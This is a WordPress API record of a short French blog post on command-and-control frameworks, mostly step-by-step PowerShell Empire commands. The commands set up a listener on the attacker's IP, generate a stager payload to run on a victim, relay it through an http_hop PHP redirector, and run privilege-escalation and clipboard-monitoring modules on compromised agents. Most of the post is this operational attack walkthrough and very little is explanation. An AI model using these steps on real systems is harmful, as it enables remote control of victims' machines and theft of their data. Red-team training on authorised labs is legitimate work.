{"id":607,"date":"2021-07-22T08:23:48","date_gmt":"2021-07-22T13:23:48","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=607"},"modified":"2022-04-27T07:50:18","modified_gmt":"2022-04-27T12:50:18","slug":"command-and-control-framework","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/","title":{"rendered":"Command and control framework"},"content":{"rendered":"<p>Liste de framework disponible<\/p>\n<ul>\n<li>Cobalt Strike (Payant)<\/li>\n<li>Covenant<\/li>\n<li>Merlin<\/li>\n<li>Shadow<\/li>\n<li>PoshC2<\/li>\n<li>powershell empire<\/li>\n<\/ul>\n<p>Nous nous attarderons ici \u00e0 powershell empire<br \/>\n<pre><code>sudo apt install powershell-empire starkiller #installation. starkiller est l&#039;interface web. https:\/\/localhost:1337. empireadmin\/password123\nsudo powershell-empire server #fichier de configuration dans \/usr\/share\/powershell-empire\/empire\/client\/config.yaml\npowershell-empire client\nuselistener http\nset Name CLIHTTP\nset Host Host 10.9.0.60 #notre adresse IP\nset Port 8000\nexecute #d\u00e9marre le listener\nback #ou main pour le menu principal\nlisteners #liste des listeners\nkill LISTENER_NAME #efface le listener<\/code><\/pre><\/p>\n<p>Un stager est un payload<\/p>\n<p><pre><code>usestager multi\/bash\nset Listener CLIHTTP\nexecute #nous obtenons le code \u00e0 ex\u00e9cuter sur la victime\nshell\nctrl+c\nagents #apr\u00e8s ex\u00e9cution du payload, nous verrons l&#039;agent dans powershell empire\ninteract AGENT_NAME\nhelp\nback\nkill AGENT_NAME<\/code><\/pre><\/p>\n<p>Si la victime o\u00f9 nous ex\u00e9cuterons le payload n&#8217;a pas directement acc\u00e8s au serveur powershell empire, nous devons cr\u00e9er un hop_listener<\/p>\n<p><pre><code>uselistener http_hop\nset Name http_hop\nset RedirectListener CLIHTTP\nset Host 10.9.0.69 #adresse \u00e0 laquelle le payload se connectera. nous effectuerons un port forward vers le serveur ps empire\nset Port 47000\noptions\nexecute #nous obtenons des fichiers .php dans le r\u00e9pertoire \/tmp<\/code><\/pre><\/p>\n<p>On transf\u00e8re les fichiers php sur la machine qui servira de HOP<br \/>\n<code>php -S 0.0.0.0:47000 &amp;&gt;\/dev\/null &amp; #il faut aussi ouvrir le port dans le firewall<\/code><\/p>\n<p><pre><code>usestager multi\/launcher\nset Listener http_hop\nexecute #on ex\u00e9cute le payload sur la victime (on url encode). \u00c0 partir d&#039;ici, on devrait voir un agent. <\/code><\/pre><\/p>\n<p>La commande usemode MODULE_NAME peut \u00eatre utilis\u00e9 pour utiliser un module lors de l&#8217;ex\u00e9cution d&#8217;un agent<br \/>\n<pre><code>usemodule powershell\/privesc\/sherlock\nexecute\nusemodule collection\/clipboard_monitor\nexecute<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Liste de framework disponible Cobalt Strike (Payant) Covenant Merlin Shadow PoshC2 powershell empire Nous nous attarderons ici \u00e0 powershell empire sudo apt install powershell-empire starkiller #installation. starkiller est l&#039;interface web. https:\/\/localhost:1337. empireadmin\/password123 sudo powershell-empire server #fichier de configuration dans \/usr\/share\/powershell-empire\/empire\/client\/config.yaml powershell-empire client uselistener http set Name CLIHTTP set Host Host 10.9.0.60 #notre adresse IP set Port 8000 execute #d\u00e9marre le listener back #ou main pour le menu principal listeners #liste des listeners kill LISTENER_NAME #efface le listener Un stager est un payload usestager multi\/bash set Listener CLIHTTP execute #nous obtenons le code \u00e0 ex\u00e9cuter sur la victime shell ctrl+c agents <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Command and control framework - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Command and control framework - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"Liste de framework disponible Cobalt Strike (Payant) Covenant Merlin Shadow PoshC2 powershell empire Nous nous attarderons ici \u00e0 powershell empire sudo apt install powershell-empire starkiller #installation. starkiller est l&#039;interface web. https:\/\/localhost:1337. empireadmin\/password123 sudo powershell-empire server #fichier de configuration dans \/usr\/share\/powershell-empire\/empire\/client\/config.yaml powershell-empire client uselistener http set Name CLIHTTP set Host Host 10.9.0.60 #notre adresse IP set Port 8000 execute #d\u00e9marre le listener back #ou main pour le menu principal listeners #liste des listeners kill LISTENER_NAME #efface le listener Un stager est un payload usestager multi\/bash set Listener CLIHTTP execute #nous obtenons le code \u00e0 ex\u00e9cuter sur la victime shell ctrl+c agents\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-22T13:23:48+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-04-27T12:50:18+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/\",\"name\":\"Command and control framework - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-07-22T13:23:48+00:00\",\"dateModified\":\"2022-04-27T12:50:18+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Command and control framework\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Command and control framework - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/","og_locale":"fr_CA","og_type":"article","og_title":"Command and control framework - S\u00e9curiser votre site","og_description":"Liste de framework disponible Cobalt Strike (Payant) Covenant Merlin Shadow PoshC2 powershell empire Nous nous attarderons ici \u00e0 powershell empire sudo apt install powershell-empire starkiller #installation. starkiller est l&#039;interface web. https:\/\/localhost:1337. empireadmin\/password123 sudo powershell-empire server #fichier de configuration dans \/usr\/share\/powershell-empire\/empire\/client\/config.yaml powershell-empire client uselistener http set Name CLIHTTP set Host Host 10.9.0.60 #notre adresse IP set Port 8000 execute #d\u00e9marre le listener back #ou main pour le menu principal listeners #liste des listeners kill LISTENER_NAME #efface le listener Un stager est un payload usestager multi\/bash set Listener CLIHTTP execute #nous obtenons le code \u00e0 ex\u00e9cuter sur la victime shell ctrl+c agents","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-07-22T13:23:48+00:00","article_modified_time":"2022-04-27T12:50:18+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/","name":"Command and control framework - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-07-22T13:23:48+00:00","dateModified":"2022-04-27T12:50:18+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/22\/command-and-control-framework\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Command and control framework"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/607"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=607"}],"version-history":[{"count":6,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/607\/revisions"}],"predecessor-version":[{"id":629,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/607\/revisions\/629"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=607"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=607"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=607"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}